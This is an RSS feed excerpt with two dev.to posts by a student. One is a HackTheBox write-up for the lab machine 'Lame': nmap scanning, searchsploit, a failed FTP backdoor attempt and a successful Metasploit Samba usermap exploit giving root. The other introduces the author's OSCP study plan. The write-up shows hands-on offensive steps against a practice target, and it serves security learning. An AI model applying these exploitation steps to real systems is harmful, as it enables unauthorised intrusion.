&lt;p&gt;As always, we start with a simple nmap command, just to check which ports are open and which services are running on those ports.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;-T4&lt;/strong&gt; Scan speed. Fast and noisy, but okay for this lab.&lt;br&gt;
&lt;strong&gt;-p-&lt;/strong&gt; Scans all ports&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--rR2Tw_ck--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/baof4djhcjtbunhhxm6o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--rR2Tw_ck--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/baof4djhcjtbunhhxm6o.png" alt="nmap scan"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then, once I've found all open ports, I run an -A scan, passing those ports as parameters, so we can get all the information we can from them, and then proceed to investigate the vulnerabilities we find.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;-T4&lt;/strong&gt; Scan speed&lt;br&gt;
&lt;strong&gt;-p21,22,139,445,3632&lt;/strong&gt; The ports I want to focus my scan on&lt;br&gt;
&lt;strong&gt;-A&lt;/strong&gt; Returns all the information nmap can about those ports&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--PuLoezW0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/rg22o1k8rpfpxi3kv8gn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--PuLoezW0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/rg22o1k8rpfpxi3kv8gn.png" alt="second nmap scan"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can also get information from the nmap scripts that can be useful for exploiting those open ports.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--DPQpc6p9--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/1dezmaubx4n0taf2ye4z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--DPQpc6p9--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/1dezmaubx4n0taf2ye4z.png" alt="Scripts"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I'd like to say I really enjoy this method, because it does the hard work only on the necessary ports, saving us some time, but it's not The Right Method to follow. It's important to explore and experiment with those methods, and learn how to use them in a way you're satisfied with. The most important thing I'm learning about pentesting is to develop your methodology as you go, so it becomes easier for you to understand the steps to a successful process.&lt;/p&gt;

&lt;p&gt;Back to our recon, two things here are really eye-catching: SMB is usually a go-to port to exploit. But port 21 also has an FTP service, which allows anonymous login. So let's try that first.&lt;/p&gt;

&lt;p&gt;Running searchsploit to look for exploits related to this FTP (using its version as the parameter - versions can be really good starting points when looking for an exploit), we get the following results.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--5qlcY2Kj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/ed0z7gwwjbcywtb5dtb2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--5qlcY2Kj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/ed0z7gwwjbcywtb5dtb2.png" alt="Searchsploit results"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&amp;gt; Phase Two - Exploitation&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;We then go to Metasploit and look for our vulnerability. Luckily we find a backdoor that is rated "excellent", which is good news (usually).&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--MD3TR-IZ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/qeumrq3a7nhap0znguhl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--MD3TR-IZ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/qeumrq3a7nhap0znguhl.png" alt="Metasploit"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we run &lt;strong&gt;use 3&lt;/strong&gt; to select the third option displayed in the table. Then, once we're inside our exploit's context, we run &lt;strong&gt;options&lt;/strong&gt; to check what we need to set to run this exploit. It only has two required fields, one being RPORT, which is already prefilled with the target port 21, and a RHOSTS field, yet to be completed. We run &lt;strong&gt;set RHOSTS 10.10.10.3&lt;/strong&gt;, using our target's IP, and then we run &lt;strong&gt;options&lt;/strong&gt; again just to check that everything is in order.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--eny4cvsv--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/2yj9fksieplk6iz0inhj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--eny4cvsv--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/2yj9fksieplk6iz0inhj.png" alt="Exploit settings"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We try running the exploit twice, but it fails. In my first attempts to use Metasploit I got really confused about why this was happening, but with time I learned it's quite common, depending on how patches come along and fix those vulnerabilities. But it's okay, we just need to jump to another port and try another exploit.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--pF86ig9D--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/e2ytqh71a0p8yekrug2w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--pF86ig9D--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/e2ytqh71a0p8yekrug2w.png" alt="Exploit fails"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As I said before, SMB/Samba services are really good places to start exploiting, since they are quite dangerous. In our information gathering step, we found a Samba install with a very specific version. Let's try looking for this one now on Metasploit.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--eJ5t1xAX--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/afqgc3jkqzqgq6rvhil9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--eJ5t1xAX--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/afqgc3jkqzqgq6rvhil9.png" alt="Samba Metasploit"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As we can see, one of the exploits is related to Metasploit, so since we have this useful tool already in our hands, let's jump into it first and see what we can get.&lt;/p&gt;

&lt;p&gt;Running a "search samba usermap script" on Metasploit, we find a lot of options, and paying attention to then, we find the one that matches exactly what we are looking for&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--PQZHOwGr--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/sfsjoq3qzrga99unchi6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--PQZHOwGr--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/sfsjoq3qzrga99unchi6.png" alt="Samba Found in Metasploit"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We just need to run &lt;strong&gt;use 151&lt;/strong&gt; (151 being the number for that exploit shown in the first column) to access it. Running &lt;strong&gt;options&lt;/strong&gt; we see what needs to be set.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--BjpdbGoi--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/dhhnq6imzc1he7pmbv37.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--BjpdbGoi--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/dhhnq6imzc1he7pmbv37.png" alt="Accessing the exploit"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We then configure our exploit with &lt;strong&gt;set RHOSTS&lt;/strong&gt;, running &lt;strong&gt;options&lt;/strong&gt; once more just to check that all the required and important information is filled in.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--8J6HV67B--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/4bjwwuvq1itdhocllu4w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--8J6HV67B--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/4bjwwuvq1itdhocllu4w.png" alt="Exploit fully set"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With all the required fields filled, we just need to run the exploit...&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--5g22TEdb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/b98z3iohd3tt9zjr60kl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--5g22TEdb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/b98z3iohd3tt9zjr60kl.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And voila, we have a shell! Nice!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&amp;gt; Phase Three - Post-Exploitation&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;We start this phase by running &lt;strong&gt;pwd&lt;/strong&gt; and &lt;strong&gt;whoami&lt;/strong&gt; to see which directory we are in, and which user we are running as.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--GZN1P22K--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/4acnyipdg0mjcmac9vg2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--GZN1P22K--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/4acnyipdg0mjcmac9vg2.png" alt="pwd and whoami"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Nice, we already have root privileges, so no need to escalate here. Now, we just need to go after our flags in user.txt and root.txt.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--SQB4ssfw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/gzqrph236b0otgxlbcmm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SQB4ssfw--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/gzqrph236b0otgxlbcmm.png" alt="user.txt"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--y-n6Pbe5--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/rq7tu59n8jxdzrs0wf94.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--y-n6Pbe5--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/rq7tu59n8jxdzrs0wf94.png" alt="root.txt"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And that's it! Lame has been pwned! (:&lt;/p&gt;

&lt;h2&gt;Table Of Contents&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.to/manticorevault/hackthebox-write-ups-an-introduction-259b"&gt;Step 0 - Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/manticorevault/hackthebox-write-ups-lame-49c"&gt;Step 1 - Lame&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
    </item>
    <item>
      <title>HackTheBox Write-Ups - An Introduction</title>
      <dc:creator>Artur Serra</dc:creator>
      <pubDate>Thu, 02 Jul 2020 04:32:12 +0000</pubDate>
      <link>https://dev.to/arturserra/hackthebox-write-ups-an-introduction-259b</link>
      <guid>https://dev.to/arturserra/hackthebox-write-ups-an-introduction-259b</guid>
      <description>&lt;p&gt;Hello, internet person,&lt;/p&gt;

&lt;p&gt;The time to write my first post here on Dev.to has come! After struggling to think of an idea or a really cool and worthy project to start writing some things down, I finally decided to try and write something that was almost done: my write-ups.&lt;/p&gt;

&lt;p&gt;A bit of context first: HackTheBox is this awesome platform on which you can try your pentesting skills against some virtual machines - or boxes - packed with vulnerabilities ready to be exploited. Sounds nice, huh? As a cybersecurity student, it's a must for me to experiment with those labs, especially in order to pursue the OSCP - Offensive Security Certified Professional - a very important cybersecurity certification.&lt;/p&gt;

&lt;p&gt;To be quite honest, I still don't know if I want to take the OSCP as of now... but I understand how taking it and the Advanced Web Attacks and Exploitation certification's exam can be really useful to my main goal of developing my developer skills with a good base in security. So, why not start preparing for it right now, even if at a slower pace?&lt;/p&gt;

&lt;p&gt;That being said, after a lot of research and &lt;a href="https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/"&gt;this awesome story from Rana Khalil&lt;/a&gt; about her journey to get her OSCP Cert, I finally had a roadmap. Now, time to follow it.&lt;/p&gt;

&lt;p&gt;The targets were finally there, since I decided to follow her footsteps and also try to hack all the machines from &lt;a href="https://docs.google.com/spreadsheets/u/1/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview#"&gt;TJ_Null's OSCP-Like VM's&lt;/a&gt; list. It's important to note that those machines are always being updated, which keeps this list relevant at all times. He also has a list of VulnHub machines, which I might consider every now and then when my HackTheBox subscription expires (since I'm not on an automatic subscription, leaving it for when I decide to focus on Retired Machines, only accessible with the VIP account).&lt;/p&gt;

&lt;p&gt;Now I have the roadmap and the targets, but... something is still missing: I need to learn how to walk it. Gladly, I found really good tutors at university, but I was a total, complete noob in all things related to pentesting, and I still needed a nice place to start. That's where I found &lt;a href="https://www.udemy.com/course/practical-ethical-hacking/"&gt;Heath Adams' Practical Ethical Hacking course at Udemy&lt;/a&gt;. His methodology just clicked with me. It was way easier to understand the basic concepts, even though I still haven't finished the course - it's paused right now while I write this - because his way of explaining things just inspired me to start this post and this whole plan to document my way through TJ_Null's list.&lt;/p&gt;

&lt;p&gt;Without further ado, let's go hack some things!&lt;/p&gt;

&lt;h2&gt;Table Of Contents&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.to/manticorevault/hackthebox-write-ups-an-introduction-259b"&gt;Step 0 - Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/manticorevault/hackthebox-write-ups-lame-49c"&gt;Step 1 - Lame&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
    </item>
  </channel>
</rss>
